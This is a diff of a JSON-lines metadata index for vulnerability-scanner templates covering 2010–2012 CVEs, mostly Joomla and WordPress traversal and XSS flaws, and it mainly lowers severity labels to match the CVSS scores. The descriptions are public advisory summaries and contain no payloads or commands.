{"ID":"CVE-2010-2034","Info":{"Name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2034.yaml"} @@ -133,38 +133,38 @@ {"ID":"CVE-2010-2037","Info":{"Name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2037.yaml"} {"ID":"CVE-2010-2045","Info":{"Name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2045.yaml"} {"ID":"CVE-2010-2050","Info":{"Name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2050.yaml"} -{"ID":"CVE-2010-2122","Info":{"Name":"Joomla! Component simpledownload \u003c=0.9.5 - Arbitrary File Retrieval","Severity":"high","Description":"A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2122.yaml"} +{"ID":"CVE-2010-2122","Info":{"Name":"Joomla! Component simpledownload \u003c=0.9.5 - Arbitrary File Retrieval","Severity":"medium","Description":"A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2122.yaml"} {"ID":"CVE-2010-2128","Info":{"Name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2128.yaml"} {"ID":"CVE-2010-2259","Info":{"Name":"Joomla! Component com_bfsurvey - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2259.yaml"} -{"ID":"CVE-2010-2307","Info":{"Name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) \"//\" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-2307.yaml"} -{"ID":"CVE-2010-2507","Info":{"Name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2507.yaml"} -{"ID":"CVE-2010-2680","Info":{"Name":"Joomla! Component jesectionfinder - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2680.yaml"} +{"ID":"CVE-2010-2307","Info":{"Name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","Severity":"medium","Description":"Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) \"//\" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-2307.yaml"} +{"ID":"CVE-2010-2507","Info":{"Name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2507.yaml"} +{"ID":"CVE-2010-2680","Info":{"Name":"Joomla! Component jesectionfinder - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2680.yaml"} {"ID":"CVE-2010-2682","Info":{"Name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2682.yaml"} -{"ID":"CVE-2010-2857","Info":{"Name":"Joomla! Component Music Manager - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2857.yaml"} +{"ID":"CVE-2010-2857","Info":{"Name":"Joomla! Component Music Manager - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2857.yaml"} {"ID":"CVE-2010-2861","Info":{"Name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2861.yaml"} {"ID":"CVE-2010-2918","Info":{"Name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","Severity":"high","Description":"A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2918.yaml"} -{"ID":"CVE-2010-2920","Info":{"Name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2920.yaml"} -{"ID":"CVE-2010-3203","Info":{"Name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","Severity":"high","Description":"A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2010/CVE-2010-3203.yaml"} +{"ID":"CVE-2010-2920","Info":{"Name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2920.yaml"} +{"ID":"CVE-2010-3203","Info":{"Name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","Severity":"medium","Description":"A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-3203.yaml"} {"ID":"CVE-2010-3426","Info":{"Name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-3426.yaml"} {"ID":"CVE-2010-4231","Info":{"Name":"Camtron CMNC-200 IP Camera - Directory Traversal","Severity":"high","Description":"The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.","Classification":{"CVSSScore":"7.8"}},"file_path":"http/cves/2010/CVE-2010-4231.yaml"} {"ID":"CVE-2010-4239","Info":{"Name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","Severity":"critical","Description":"Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2010/CVE-2010-4239.yaml"} {"ID":"CVE-2010-4282","Info":{"Name":"phpShowtime 2.0 - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-4282.yaml"} -{"ID":"CVE-2010-4617","Info":{"Name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-4617.yaml"} +{"ID":"CVE-2010-4617","Info":{"Name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-4617.yaml"} {"ID":"CVE-2010-4719","Info":{"Name":"Joomla! Component JRadio - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-4719.yaml"} {"ID":"CVE-2010-4769","Info":{"Name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-4769.yaml"} {"ID":"CVE-2010-4977","Info":{"Name":"Joomla! Component Canteen 1.0 - Local File Inclusion","Severity":"high","Description":"A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-4977.yaml"} {"ID":"CVE-2010-5028","Info":{"Name":"Joomla! Component JE Job 1.0 - Local File Inclusion","Severity":"high","Description":"A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-5028.yaml"} -{"ID":"CVE-2010-5278","Info":{"Name":"MODx manager - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-5278.yaml"} -{"ID":"CVE-2010-5286","Info":{"Name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-5286.yaml"} -{"ID":"CVE-2011-0049","Info":{"Name":"Majordomo2 - SMTP/HTTP Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-0049.yaml"} -{"ID":"CVE-2011-1669","Info":{"Name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","Severity":"high","Description":"A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-1669.yaml"} -{"ID":"CVE-2011-2744","Info":{"Name":"Chyrp 2.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2011/CVE-2011-2744.yaml"} -{"ID":"CVE-2011-2780","Info":{"Name":"Chyrp 2.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2011/CVE-2011-2780.yaml"} +{"ID":"CVE-2010-5278","Info":{"Name":"MODx manager - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-5278.yaml"} +{"ID":"CVE-2010-5286","Info":{"Name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","Severity":"critical","Description":"A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2010/CVE-2010-5286.yaml"} +{"ID":"CVE-2011-0049","Info":{"Name":"Majordomo2 - SMTP/HTTP Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-0049.yaml"} +{"ID":"CVE-2011-1669","Info":{"Name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","Severity":"medium","Description":"A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-1669.yaml"} +{"ID":"CVE-2011-2744","Info":{"Name":"Chyrp 2.x - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2011/CVE-2011-2744.yaml"} +{"ID":"CVE-2011-2780","Info":{"Name":"Chyrp 2.x - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-2780.yaml"} {"ID":"CVE-2011-3315","Info":{"Name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.","Classification":{"CVSSScore":"7.8"}},"file_path":"http/cves/2011/CVE-2011-3315.yaml"} {"ID":"CVE-2011-4336","Info":{"Name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","Severity":"medium","Description":"Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET \"ajax\" parameter to snarf_ajax.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2011/CVE-2011-4336.yaml"} {"ID":"CVE-2011-4618","Info":{"Name":"Advanced Text Widget \u003c 2.0.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4618.yaml"} {"ID":"CVE-2011-4624","Info":{"Name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4624.yaml"} -{"ID":"CVE-2011-4804","Info":{"Name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-4804.yaml"} +{"ID":"CVE-2011-4804","Info":{"Name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-4804.yaml"} {"ID":"CVE-2011-4926","Info":{"Name":"Adminimize 1.7.22 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4926.yaml"} {"ID":"CVE-2011-5106","Info":{"Name":"WordPress Plugin Flexible Custom Post Type \u003c 0.1.7 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5106.yaml"} {"ID":"CVE-2011-5107","Info":{"Name":"Alert Before Your Post \u003c= 0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5107.yaml"} @@ -172,31 +172,33 @@ {"ID":"CVE-2011-5181","Info":{"Name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5181.yaml"} {"ID":"CVE-2011-5252","Info":{"Name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2011/CVE-2011-5252.yaml"} {"ID":"CVE-2011-5265","Info":{"Name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5265.yaml"} -{"ID":"CVE-2012-0392","Info":{"Name":"Apache Struts2 S2-008 RCE","Severity":"critical","Description":"The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2012/CVE-2012-0392.yaml"} -{"ID":"CVE-2012-0394","Info":{"Name":"Apache Struts \u003c2.3.1.1 - Remote Code Execution","Severity":"critical","Description":"Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2012/CVE-2012-0394.yaml"} -{"ID":"CVE-2012-0896","Info":{"Name":"Count Per Day \u003c= 3.1 - download.php f Parameter Traversal Arbitrary File Access","Severity":"high","Description":"An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-0896.yaml"} +{"ID":"CVE-2012-0392","Info":{"Name":"Apache Struts2 S2-008 RCE","Severity":"medium","Description":"The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2012/CVE-2012-0392.yaml"} +{"ID":"CVE-2012-0394","Info":{"Name":"Apache Struts \u003c2.3.1.1 - Remote Code Execution","Severity":"medium","Description":"Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2012/CVE-2012-0394.yaml"} +{"ID":"CVE-2012-0896","Info":{"Name":"Count Per Day \u003c= 3.1 - download.php f Parameter Traversal Arbitrary File Access","Severity":"medium","Description":"An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-0896.yaml"} {"ID":"CVE-2012-0901","Info":{"Name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-0901.yaml"} -{"ID":"CVE-2012-0981","Info":{"Name":"phpShowtime 2.0 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-0981.yaml"} -{"ID":"CVE-2012-0991","Info":{"Name":"OpenEMR 4.1 - Local File Inclusion","Severity":"high","Description":"Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2012/CVE-2012-0991.yaml"} -{"ID":"CVE-2012-0996","Info":{"Name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","Severity":"high","Description":"Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2012/CVE-2012-0996.yaml"} +{"ID":"CVE-2012-0981","Info":{"Name":"phpShowtime 2.0 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-0981.yaml"} +{"ID":"CVE-2012-0991","Info":{"Name":"OpenEMR 4.1 - Local File Inclusion","Severity":"low","Description":"Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.","Classification":{"CVSSScore":"3.5"}},"file_path":"http/cves/2012/CVE-2012-0991.yaml"} +{"ID":"CVE-2012-0996","Info":{"Name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","Severity":"medium","Description":"Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-0996.yaml"} {"ID":"CVE-2012-1226","Info":{"Name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","Severity":"high","Description":"Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2012/CVE-2012-1226.yaml"} -{"ID":"CVE-2012-1823","Info":{"Name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","Severity":"critical","Description":"sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping 